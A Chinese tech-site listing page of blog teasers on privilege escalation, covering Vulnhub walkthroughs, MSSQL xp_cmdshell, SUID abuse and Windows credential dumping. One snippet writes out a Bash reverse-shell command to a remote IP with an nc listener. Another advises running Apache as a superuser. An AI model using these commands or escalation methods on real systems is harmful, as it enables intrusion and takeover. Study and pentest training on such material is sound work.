E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
SUID提权
apache php 无法读取网络邻居共享文件的处理,
提权
windows读取共享文件可以,但php读写就不行,甚至是“拒绝访问”,比如执行语句file_get_contents('\\\\192.168.100.111\temp\goods.txt');其原因可能是apache的用户身份,在服务里面,找到apache,右键【属性】->登录,默认的本地系统账户,我们把它改为超级管理员然后再读取共享文件,就可以了
wuzuyu365
·
2020-09-10 11:08
php
apache
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、
提权
、小工具等
Penetration_Testing_POC请善用搜索[Ctrl+F]查找IOTDevice&MobilePhoneWebAPP
提权
辅助相关PCtools-小工具集合文章/书籍/教程相关说明请善用搜索
github导航师
·
2020-09-10 00:12
网络安全
安全漏洞
thinkphp
cms
Vulnhub靶机第十四关
本关只提供
提权
部分。
L无所不能
·
2020-09-03 18:57
Vulnhub靶机第十四关
安全
linux
提权
当我们拿到了一台Linux服务器的低权限账号,于是,我们想要通过技术手段
提权
至root用户权限,以执行更多的操作。首先关于Linux
提权
我们得先明白几个概念。
卿酌南烛_b805
·
2020-08-30 21:02
第三方应用软件
提权
[第三方软件Serv-u
提权
]Serv-UFTPServer,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。
卿酌南烛_b805
·
2020-08-29 23:23
CVE-2016-0040 滥用GDI 内核
提权
漏洞
正好前段时间看到了利用GDI
提权
漏洞,赶紧学习一波。在2016年2月份微软修复了CVE-2016-0040内核级别的特权提升漏洞。
看雪学院
·
2020-08-26 15:51
哭笑不得的科研
最近在做linuxkernel
提权
分析的工作,做好了一个分析工具,准备开始大展身手的时候,发现
提权
漏洞的例子不好找,于是开始在互联网上查找(游荡)。突然,redhat的一个“漏洞”成功的吸引来我。
敖木又
·
2020-08-26 11:08
Linux基础——系统安全及应用(su切换用户PAM认证,sudo
提权
,grub加密,账号密码破解,端口扫描)(十)
系统安全及应用一.账号安全控制1.系统账号清理2.密码安全控制3.命令历史、自动销毁二.用户切换与
提权
2.1su命令2.1sudo命令——提升权限2.1.1su命令的缺点2.1.2sudo命令的用途及用法三
提笔写春秋
·
2020-08-26 07:11
Linux基础
信息收集之被动信息收集
信息收集DNS注册信息nslookup/digdns域名爆破recon-ng(信息收集)2.搜索引擎google搜索SHODAN搜索渗透测试流程:1.信息收集(30%~50%)2.漏洞扫描3.漏洞利用4.
提权
WY92139010
·
2020-08-25 17:54
靶机SickOs1.2练习:上传马文件菜刀连接/反弹shell,进行本地
提权
1.主机发现2.信息扫描指纹信息3.端口访问该页面未发现有效信息尝试ssh弱口令连接,密码为root,直接
提权
成功!
7Riven
·
2020-08-25 17:33
渗透学习
靶机练习
文件上传漏洞小结
2危害•网站被控制,对文件增删改查,执行命令,链接数据库•如果服务器长久未更新,可以利用exp
提权
,导致服务器沦陷•同服务器的其他网站沦陷3导致漏洞原因·服务器配置不当(iis6.0put直接写文件)·
accqe57764
·
2020-08-25 17:53
php
运维
数据库
大话Electron应用自动更新
Windows下更新特有的问题软件更新在Linux和macOS还好说,但是在Windows上可能会遇到UAC问题,常用的方法是:Windows计划任务、WindowsService,本质上这两种方式还是
提权
爱吃糖的蓝胖子
·
2020-08-25 16:07
基础(一)
www.cnblogs.com/Rain99-/p/10621393.html2.32位与64位32位(x86)与64位(x64)最大的区别在可识别的内存容量32位最大可识别4g64位最大可识别128g3.系统的版本对
提权
很重要
baodou5922
·
2020-08-25 16:42
数据库
php
java
第十八章——内网渗透之域渗透
MSF在讲域渗透之前,先给大家讲讲MSF●kali代理配置http://pawelli.com/archives/527●回顾msf知识●针对内网批量扫描ms17-010●针对域成员08R2msf渗透并
提权
要点
L18296069161
·
2020-08-25 15:24
网络安全
科技公开课程
内网渗透
提权
学习:反弹shell的实现方式和检测方法
我所理解的反弹shell,是外部人员通过web或者软件的漏洞,建立了一个数据流通向网络外部的shell执行环境。现在针对一些网络上反弹shell实例作说明:反弹shell现在针对一些网络上反弹shell实例作说明:实例1,Bash反弹:Bash反弹,远程主机监听端口:nc-lvp7777被入侵的机器反弹shell命令如下:bash-i>&/dev/tcp/192.168.7.61/77770>&1
Agan '
·
2020-08-25 15:45
渗透测试
提权学习
后渗透篇
Hackthebox-Craft (Machine Maker: rotarydrone)
目录前言0x00nmap扫描0x01web页面入手0x01搜索数据库0x02继续搜集repo0x03
提权
第一种第二种参考资料前言IP:10.10.10.110很接近真实环境的盒子,全靠信息泄露,(做了好久
Just1ceP4rtn3r
·
2020-08-25 09:55
WP
渗透测试靶机vulnhub_five86:1
sS-sV-p--T5-A发现只开了80端口访问发现一个cmsopennetadmin搜索该cms是否有直接可利用的exp,果然存在反弹回一个webshell搜集linux系统信息,检查一下内核版本,没有内核
提权
漏洞在后台配置文件找到数据库密码用
MMMy5tery
·
2020-08-25 08:43
靶机实战(DC-5)
DC-5实验环境实验过程信息收集主机发现端口扫描服务发现网站指纹目录扫描漏洞发现漏洞利用
提权
总结实验环境靶机:DC-5测试机:kali(IP:192.168.186.128),win10实验过程信息收集主机发现
~~...
·
2020-08-25 08:36
靶机实战
Me-and-My-girlfriend-1靶机实战-vuluhub系列(完结)
这是vuluhub靶机实战系列完结篇了,本次主要知识点为:XFF头绕过限制,越权漏洞、sudo滥用
提权
之php命令靶机下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend
PANDA-墨森
·
2020-08-25 08:03
vuluhub靶机实战
Vulnhub-dc2学习笔记
hosts文件访问80端口http2.1使用cewl获取密码字典2.2使用WPscan获取用户名2.3使用wpscan爆破密码2.4按照提示登录获取下一个线索3.尝试使用用户名密码ssh登录4.Git
提权
Zhaohg720
·
2020-08-25 08:58
E45: 'readonly' option is set (add ! to override)的解决方案
我在终端的操作是这样的:vim/etc/hosts,然后退出,进行
提权
操作,使用root权限即可。
腾阳
·
2020-08-25 08:18
Linux学习笔记
vulnhub-dc-3
vulnhub-dc-3知识点nmapjoomlaCMS的sql注入反弹shell内核
提权
ubuntu16.04vulnhub第四个靶机靶机地址:https://www.vulnhub.com/entry
暧 昧�
·
2020-08-25 07:19
vulnhub
【VulnHub靶机渗透】八:DC-5
文章目录一、相关简介二、渗透步骤1、信息搜集1.1、搜集1.2、总结2、漏洞发现(文件包含)3、文件包含漏洞利用4、screen-4.5.0本地
提权
三、知识总结一、相关
工科学生死板板
·
2020-08-25 07:14
#
VulnHub综合靶机
【VulnHub靶机渗透】九:maskcrafter-1.1
文章目录一、相关简介二、渗透步骤1、信息搜集2、漏洞发现Ps:任意命令执行漏洞3、漏洞利用3.1、建立反弹shell3.2、逐步
提权
至其他用户1)
提权
至userx用户2)
提权
至e
工科学生死板板
·
2020-08-25 07:14
#
VulnHub综合靶机
利用ms17-010漏洞
提权
一、打开kali和win7查看IP。(1)Windows7作为靶机IP:192.168.43.109(2)Kali作为攻击机(最新版kaili)IP:192.168.43.49二、打开kali进入终端输入nmap+IP查看靶机是否开启445端口。三、在kali中输入msfconsole(等待一会可能会有点慢)四、进入后输人searchms17-010(搜素攻击模块)五、找到exploitwindo
MzHeader
·
2020-08-25 07:36
kali
slmap udf
提权
原理
0x01-udf是什么?udf=‘userdefinedfunction’,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。0x02-如何使用udf?假设我的udf文件名为‘udf.dll’
MzHeader
·
2020-08-25 07:05
sql注入
sqlmap
mysql
sql
数据库
sqlmap udf
提权
过程
0x02windows下udf
提权
的条件如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/如果mysql版本小于5
MzHeader
·
2020-08-25 07:05
sql注入
sudo 滥用
提权
Sunset: Vulnhub
sunset-1,339/主机发现扫描端口2122端口尝试无头登录得到一个backup文件是hash可以同过john爆破由于辣鸡电脑爆破不出来py了密码cheer14用户名sunsetssh登录sudo
提权
本次靶机给的是
m0_46580995
·
2020-08-25 07:56
复现
提权
相关网站
1、linux
提权
方法(不断总结更新)https://www.cnblogs.com/zaqzzz/p/12075132.html2、Linux
提权
https://blog.csdn.net/silentpebble
devil8123665
·
2020-08-25 07:56
靶机
Linux内核
提权
漏洞发现与利用
漏洞发现针对相应系统版本的cve
提权
漏洞uname-a所有版本uname-r内核版本信息cat/proc/version内核信息LinuxExploitSuggester下载linux-exploit-suggester.sh
想冲大厂的癞蛤蟆
·
2020-08-25 06:11
漏洞提权
渗透测试
渗透测试之DC-5
目录再扫描:随机footer:猜测thankyou.php存在文件包含,尝试FUZZ参数:参数fuzz:遍历读取一波文件:利用nginx日志写入shell:利用文件包含成功获取shell:反弹shell:搜索
SUID
csdnPM250
·
2020-08-25 06:17
渗透测试
rsync未授权访问漏洞
文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1漏洞探测3.2漏洞利用(下载任意文件)3.3漏洞利用(
提权
、反弹shell)3.3.1方法一3.3.2方法二四、修复建议一、漏洞介绍 rsync是Linux
風月长情
·
2020-08-25 06:09
漏洞复现
域渗透初探
6、
提权
的工具准备不足,7、切换为本地用户的时候,可安装软件,但
wkmccc
·
2020-08-25 06:56
[渗透测试篇]Vulnhub之靶机DC-2
文章目录靶机描述实验环境渗透思路获取目标IP(netdiscover)端口扫描(nmap)生成密码(cewl)获取用户名(wpscan)暴力破解(hydra)登录后台全端口扫描/SSH登录逃脱受限shell/导入$PATHgit
提权
知识总结
「已注销」
·
2020-08-25 06:55
渗透测试
记一次实战
提权
到内网初探
一、前言由于之前写过几篇都是拿到WebShell后就结束了,所以本文略过前期拿WebShell的过程,侧重点在获取了WebShell后的思路。本文为实战类文章,仅到内网做了初探,故较为基础,适合像我这类型的小白,大佬略过。实战最大的乐趣是可能会遇到各种问题,不像自己搭环境,一路干脆利索。所以实战更多的是思考及尝试。PS:截至投稿前,已将漏洞提交厂商并验证已完成修复。友情提示:测试过程中请务必遵守相
合天智汇
·
2020-08-25 06:49
Web渗透初探
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,
提权
,内网渗透,留后门,清理痕迹。
合天智汇
·
2020-08-25 06:17
vulnhub之DC3靶机
靶机概览信息收集nmap信息收集网站信息收集查找漏洞漏洞描述渗透攻击SQL注入攻击获取当前数据库的名字获取当前数据库的表名获取指定数据库的字段名获取目标字段密码破解getshell寻找上传点木马地址中国蚁剑
提权
反弹
lainwith
·
2020-08-25 06:36
靶机
作业
web
轻松获取windows 明文登录密码(入侵
提权
后)
一款获取Windows明文密码的小工具,自己在XP,windows7旗舰版上测试成功的。简单原理:windows将登录密码加密后没有存文件,而是存在内存中,这样只要我们找到对应的内存段,然后解密那块内存,明文密码就到手了,这里已知windows的加密密码内存段是在lsass的进程空间里,好了,黑阔们,只要注入到他的进程空间,定位到那块内存,剩下的事就是逆向一个字符串加密算法的过程了,记住这一些一定
byte_way
·
2020-08-25 06:52
信安学习
内网渗透之——mssql数据库
提权
之——xp_cmdshell执行系统命令
条件所谓利用数据进行
提权
,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行
提权
:1、必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。
卖N孩的X火柴
·
2020-08-25 05:45
渗透测试(内网渗透)
靶机实战-peixun-sever
peixun-sever靶机实战文章目录peixun-sever靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问http服务(80端口)5、
提权
1、主机发现目标IP:192.168.232.1352
滕财然
·
2020-08-25 05:03
[工具]渗透神器CobaltStrike 3.1.2 K8去后门破解版 & Windows版TeamServer
CobaltStrike(简称CS)是全球黑客公认一款非常优秀的渗透测试神器,以metasploit为基础的GUI的框架式渗透工具,集成了传统远控功能(远程桌面VNC、键盘记录、CmdShell、文件管理)、0day
提权
weixin_30802273
·
2020-08-25 05:20
操作系统
java
网络
MSSQL 漏洞利用与
提权
1、SA口令的获取webshell或源代码的获取源代码泄露嗅探(用CAIN等工具嗅探1433数据库端口)口令暴力破解2、常见SQLserver
提权
命令查看数据库的版本(select@@version;)
weixin_30702413
·
2020-08-25 05:11
提权
系列(二)----Windows Service 服务器
提权
之Mssql
提权
,GetPass
提权
,hash
提权
,LPK
提权
(一)、Mssql
提权
必要条件:获取到mssql数据库最高权限用户sa的账号密码Mssql默认端口:1433Mssql最高权限用户:sa得到sa密码之后,通过工具直接连接上去。
lfendo
·
2020-08-25 04:22
网络渗透
Web安全挖掘实战:02---HackInOS靶机实战2(获取shell,root
提权
)
前言文本是紧随着上文继续进行漏洞挖掘的上文见:https://blog.csdn.net/qq_41453285/article/details/100880689一、获取靶机端shell此处我们上传一个b374kwebshell到靶机中,并连接该shell,使用该shell种的一个功能将靶机的shell反弹给我们的kali虚拟机使用b374kwebshel的下载与使用,见文章:https://b
江南、董少
·
2020-08-25 04:08
Web安全挖掘实战
MSSQL
提权
xp_cmdshell
提权
sqlserver数据库可以通过xp_cmdshell组件执行一些系统命令默认情况下xp_cmdshell是关闭的开启xp_cmdshellEXECsp_configure'xp_cmdshell
爱玩爱睡爱学习
·
2020-08-25 03:34
渗透测试
MsSQL高级注入命令
提权
一、基本信息搜集1.注入点类型的判断andexists(select*fromsysobjects)2.注入点权限判断and1=(selectis_srvrolemember('sysadmin'))//判断是否是系统管理员and1=(selectis_srvrolemember('db_owner'))//判断是否是库权限and1=(selectis_srvrolemember('public'
dgitra7963
·
2020-08-25 03:50
Windows下利用MSSQL
提权
MSSQL默认运行在system权限上,可以通过xp_cmdshell组件(起桥梁作用)执行系统命令,执行权限继承system权限。条件:拿到数据库账号密码,且该账号是DBA权限1、在数据库配置文件中查找数据库账号密码登陆成功:2、使用xp_cmdshellexec执行命令,提示该组件被关闭:3、通过使用sp_configure启用xp_cmdshell是否开启成功:开启成功!4、netusera
zminr411421_
·
2020-08-25 02:26
web安全
靶机渗透测试实战(一)——拿下shell之后的操作、
SUID
的解释
理论基础:1、使用arp-scan-l命令进行主机扫描,确定主机ip;arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。arp-scan是KaliLinux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具允许用户定制A
weixin_45116657
·
2020-08-25 02:41
安全漏洞
CobaltStrike基础教程(一)
CobaltStrike集成了端口转发、端口扫描、socket代理、
提权
、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。
Azjj98
·
2020-08-25 02:09
安全
漏洞挖掘
Android--在非activity弹出Dialog对话框
所以要设置对话框的属性为:WindowManager.LayoutParams.TYPE_SYSTEM_ALERT需要加入权限:Android6.0以上
提权
限,需要写代码跳转到设置界面让用户手动给“显示悬浮框
chaoyu168
·
2020-08-24 21:37
Android
Android开发
上一页
32
33
34
35
36
37
38
39
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他